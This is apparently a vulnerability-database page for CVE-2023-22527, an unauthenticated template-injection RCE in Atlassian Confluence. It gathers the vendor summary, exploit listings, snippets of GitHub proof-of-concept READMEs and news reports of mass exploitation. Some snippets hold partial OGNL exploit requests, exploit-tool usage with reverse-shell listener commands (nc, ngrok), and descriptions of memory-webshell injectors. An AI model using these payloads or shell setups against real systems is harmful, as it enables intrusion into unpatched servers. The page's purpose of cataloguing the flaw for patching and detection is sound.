9.8
CVSSv3

CVE-2023-22527

Published: 16/01/2024 Updated: 26/01/2024
CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9
VMScore: 0

Vulnerability Summary

A template injection vulnerability on older versions of Confluence Data Center and Server allows an unauthenticated malicious user to achieve RCE on an affected instance. Customers using an affected version must take immediate action. Most recent supported versions of Confluence Data Center and Server are not affected by this vulnerability as it was ultimately mitigated during regular version updates. However, Atlassian recommends that customers take care to install the latest version to protect their instances from non-critical vulnerabilities outlined in Atlassian’s January Security Bulletin.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

atlassian confluence data center

atlassian confluence server

Vendor Advisories

Check Point Reference: CPAI-2023-1486 Date Published: 22 Jan 2024 Severity: Critical ...

Exploits

This Metasploit module exploits an SSTI injection in Atlassian Confluence servers A specially crafted HTTP request uses the injection to evaluate an OGNL expression resulting in OS command execution Versions 850 through 853 and 80 to 84 are known to be vulnerable ...
Atlassian Confluence versions 80x, 81x, 82x, 83x, 84x, and 850 through 853 suffer from a remote code execution vulnerability ...

Github Repositories

猫蛋儿安全团队编写的poc能报就能打。企业微信、海康、Metabase、Openfire、泛微OA......

MDPOCS 猫蛋儿安全团队编写的poc,能报就能打。 漏洞列表: Metabase 远程命令执行漏洞 海康威视 ResourceOperations任意文件上传 Openfire权限绕过漏洞 泛微E-Mobile 60-65 前台RCE 金和 OA C6 GetSqlDataaspx SQL 注入漏洞导致RCE 企业微信API信息泄漏漏洞 蓝凌OA treexmltmpl 远程命令执行漏洞 蓝凌OA Customjsp任

POC

CVE-2023-22527 Atlassian Confluence 远程代码执行漏洞 CVE-2023-22527 options: -h, --help show this help message and exit -u URL, --url URL Target URL; Example: python py -u ip:port -f FILE, --file FILE Target urllist; Example: python py -f urllisttxt -c CMD, --cmd CMD Target command; Example: python py -u ip:port -c whoami

confluence-exp

confluence 已定义的功能 暂时支持cve-2021-26085 和 cve-2022-26134, CVE_2023_22515,CVE-2023-22527 过年再看下 支持直接写入冰蝎、哥斯拉内存马 支持不写shell直接获取管理员cookie、添加管理员 支持执行自定义字节码 用法 例: java -jar confluence-expjar -u 127001:8090/ -a godzilla -c cve-2021-26085 -a 可选 behi

CVE-2023-22527 - RCE (Remote Code Execution) Vulnerability In Confluence Data Center and Confluence Server PoC

CVE-2023-22527 CVE-2023-22527 - RCE (Remote Code Execution) Vulnerability In Confluence Data Center and Confluence Server PoC Poc POST /template/aui/text-inlinevm HTTP/11 Host: 192168313:8092 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 287 label=027%2b#request05b027KEY_velocitystruts2context02705dinternalGet(027ognl027)findValue(

An Ansible role that runs Vulhub environments on a Linux system.

Ansible Role: Vulhub An Ansible role that runs Vulhub environments on a Linux system WarningThis role will start multiple vulhub environments (if defined) without checking if they have overlapping port requirements Requirements None Role Variables Available variables are listed below, along with default values (see defaults/mainyml): vulhub_install_path: /opt/vulhub vulhub

An Ansible role that runs Vulhub environments on a Linux system.

Ansible Role: Vulhub An Ansible role that runs Vulhub environments on a Linux system WarningThis role will start multiple vulhub environments (if defined) without checking if they have overlapping port requirements Requirements None Role Variables Available variables are listed below, along with default values (see defaults/mainyml): vulhub_git_url: githubcom/vulh

CVE-2023-22527

CVE-2023-22527 CVE-2023-22527 - RCE (Remote Code Execution) Vulnerability in Out-of-Date Versions of Confluence Data Center and Server Advisory Release Date Tue, Jan 16 2024 01:00 EST Products: Confluence Data Center Confluence Server Affected Versions: 80x 81x 82x 83x 84x 850-853 719x LTS versions are not affected by this vulnerability References: c

Exploit for CVE-2023-22527 - Atlassian Confluence Data Center and Server

CVE-2023-22527 ⚠️ This exploit is for defensive purposes and should be used by cybersecurity professionals to identify possible vulnerable Atlassian Confluence servers Description CVE-2023-22527 - Server-side Template Injection (SSTI) vulnerability allowing Remote Code Execution (RCE) In Confluence Data Center and Confluence Server Products and Versions affected: Produ

An Exploitation tool to exploit the confluence server that are vulnerable to CVE-2023-22527 leads to RCE

CVE-2023-22527 An Exploitation tool to exploit the confluence server that are vulnerable to CVE-2023-22527 leads to RCE which tested and proven POC in vulnerable instance of confluence data center and servers By this an attacker can execute arbitary code on vulnerable instance Installation: git clone githubcom/sanjai-AK47/CVE-2023-22527git cd CVE-2023-22527 pip insta

CVE-2023-22527 Batch scanning

I am not responsible for any illegal attacks CVE-2023-22527 Bulk scanning scripts help usage: python3 CVE-2023-22527py -u <target> [-f <file>] -c <cmd> options: -h, --help show this help message and exit -u TARGET, --target TARGET Target URL -f FILE, --file FILE URL file -c CMD, --cmd CMD

[Confluence] CVE-2023-22527 realworld poc

CVE-2023-22527-confluence [Confluence] CVE-2023-22527 realworld poc Usage Download bun githubcom/oven-sh/bun/releases Start ngrok ngrok tcp 4444 Listen localhost 4444 nc -nvlp 4444 Run exploit bun exploit-CVE-2023-22527js --lhost 0tcpapngrokio --lport 12169 --target xxx/

CVE-2023-22527 PoC of CVE-2023-22527

Información, herramientas y consejos sobre cómo realizar análisis forense en equipos con sistemas operativos Windows y Linux

Tips-and-tools-forensics-RS4 Información, herramientas y consejos sobre cómo realizar análisis forense de equipos con sistemas operativos Windows y Linux Análisis Forense en Sistemas Windows y Linux Este repositorio proporciona información detallada sobre cómo realizar análisis forense en equipos con sistemas operativos Windows y

CVE-2023-22527 - RCE (Remote Code Execution) Vulnerability In Confluence Data Center and Confluence Server PoC Detect nuclei -v -t /path/to/templateyam; -u ip:port/ Exploit python3 CVE-2023-22527py -u ip:port -lh listen-host -lp listen-port

A template injection vulnerability on older versions of Confluence Data Center and Server allows an unauthenticated attacker to achieve RCE on an affected instance. Customers using an affected version must take immediate action.

CVE-2023-22527 - Confluence Pre-Auth Remote Code Execution via OGNL Injection 🔍 Fetching vulnerability information: Description: A template injection vulnerability on older versions of Confluence Data Center and Server allows an unauthenticated attacker to achieve RCE on an affected instance Customers using an affected version must take immediate action Most recent suppo

CVE-2023-22527 - RCE (Remote Code Execution) Vulnerability In Confluence Data Center and Confluence Server PoC

CVE-2023-22527 Confluence RCE CVE-2023-22527 - RCE (Remote Code Execution) Vulnerability In Confluence Data Center and Confluence Server PoC References CVE-2023-22527 - RCE (Remote Code Execution) Vulnerability In Confluence Data Center and Confluence Server | Atlassian Support | Atlassian Documentation [CONFSERVER-93833] RCE (Remote Code Execution) in Confluence Data Center an

Atlassian Confluence - Remote Code Execution (CVE-2023-22527)

CVE-2023-22527 Atlassian Confluence - Remote Code Execution (CVE-2023-22527) Poc POST /template/aui/text-inlinevm HTTP/11 Host: localhost:8090 User-Agent: Mozilla/50 (Windows NT 100; Win64; x64) AppleWebKit/53736 (KHTML, like Gecko) Chrome/11906045159 Safari/53736 Content-Type: application/x-www-form-urlencoded label=027%2b#request05b027KEY_velocitystruts2context02

CVE-2023-22527 内存马注入工具

CVE-2023-22527-Godzilla-MEMSHELL Usage ps: 测试版本为:851,其他版本肯定也可以,但没有测试 内容参考北辰师傅之前的工具 java -jar CVE-2023-22527-Godzilla-MEMSHELL-mainjar url 哥斯拉密码 哥斯拉密钥 example java -jar CVE-2023-22527-Godzilla-MEMSHELL-mainjar xxxx/ pass key 如果

This repository presents a proof-of-concept of CVE-2023-22527

CVE-2023-22527 This repository presents a proof-of-concept of CVE-2023-22527 CVE-2023-22527 | RCE using SSTI in Confluence Disclamer This code is a proof of concept of the vulnerability, I'm not pushing anyone to use it on confluence instances they don't own This tool has been developed for research and educational purposes only and I will not be held responsible for

Atlassian Confluence - Remote Code Execution

Atlassian Confluence CVE-2023-22527 Scanner 🛡️ Overview 🌟 This tool scans for the CVE-2023-22527 vulnerability in Atlassian Confluence, a critical RCE flaw allowing unauthorized remote code execution Features 🚀 Single URL Scan: Scan a specific target for the vulnerability Bulk Scan: Process multiple URLs from a file for efficient vulnerability assessment Concurre

CVE-2023-22527 - RCE (Remote Code Execution) Vulnerability In Confluence Data Center and Confluence Server PoC

CVE-2023-22527 Confluence RCE CVE-2023-22527 - RCE (Remote Code Execution) Vulnerability In Confluence Data Center and Confluence Server PoC References CVE-2023-22527 - RCE (Remote Code Execution) Vulnerability In Confluence Data Center and Confluence Server | Atlassian Support | Atlassian Documentation CONFSERVER-93833] RCE (Remote Code Execution) in Confluence Data Center and

confluence CVE-2023-22527 漏洞利用工具,支持冰蝎/哥斯拉内存马注入,支持设置 http 代理

项目介绍 此项目参考 Boogipop 师傅的项目 githubcom/Boogipop/CVE-2023-22527-Godzilla-MEMSHELL ,在原项目上支持 冰蝎内存马的注入 增加 http 代理功能,用法 -proxy 127001:8080 修改了命令行参数解析功能处的代码 漏洞环境 注入内存马的过程中使用的环境在 githubcom/vulhub/vulhub/tree/mast

Atlassian Confluence Remote Code Execution(RCE) Proof Of Concept

CVE-2023-22527: Atlassian Confluence Vulnerability Introduction The CVE-2023-22527 vulnerability is a critical security flaw in Atlassian Confluence, a widely used collaboration and documentation platform This vulnerability exists in both Confluence Data Center and Confluence Server, which are versions of the platform designed for organizational use on self-hosted servers or c

A critical severity Remote Code Execution (RCE) vulnerability (CVE-2023-22527) was discovered in Confluence Server and Data Center.

CVE-2023-22527 Description A template injection vulnerability on older versions of Confluence Data Center and Server allows an unauthenticated attacker to achieve RCE on an affected instance Customers using an affected version must take immediate actionMost recent supported versions of Confluence Data Center and Server are not affected by this vulnerability as it was ulti

Three go-exploits exploiting CVE-2023-22527 to execute arbitrary code in memory

Executing Arbitrary Code In Confluence Memory CVE-2023-22527 is a widely known vulnerability affecting Atlassian Confluence Most exploits for this vulnerability use freemarkertemplateutilityExecute() to execute an operating system command, but they can do so much better In this repository you'll find three go-exploit implementations of CVE-2023-22527 that execute thei

jankyjred-cyphercon Files from my CypherCon talk: cypherconcom/presentation/im-the-captain-now-true-story-of-a-web-worker-watering-hole-attack/ Update the website JavaScript files to emulate the Confluence CVE-2023-22527 based on githubcom/Vozec/CVE-2023-22527 The Cloudflarewebworker example can be copied and pasted into a Cloudflare web worker and run You wi

Recent Articles

Atlassian Confluence Server RCE attacks underway from 600+ IPs
The Register

Topics Security Off-Prem On-Prem Software Offbeat Special Features Vendor Voice Vendor Voice Resources If you're still running a vulnerable instance then 'assume a breach'

More than 600 IP addresses are launching thousands of exploit attempts against CVE-2023-22527 – a critical bug in out–of-date versions of Atlassian Confluence Data Center and Server – according to non-profit security org Shadowserver. Atlassian disclosed the flaw, a template injection flaw that can allow unauthenticated remote code execution (RCE) attacks, last week. The CVE scored a CVSS rating of 10 out of 10, and it affects Confluence Data Center and Server 8 versions released before De...

Patch now: Critical VMware, Atlassian flaws found
The Register

Topics Security Off-Prem On-Prem Software Offbeat Special Features Vendor Voice Vendor Voice Resources You didn't have anything else to do this Tuesday, right?

VMware and Atlassian today disclosed critical vulnerabilities and, while neither appear to have been exploited by miscreants yet, admins should patch now to avoid disappointment. First off, a pair of issues from Atlassian. Most serious is CVE-2023-22527, a template injection flaw that can allow unauthenticated remote code execution (RCE) attacks. It scored a perfect CVSS rating of 10 out of 10 and affects Confluence Data Center and Server 8 versions released before December 5, 2023 and 8.4.5, wh...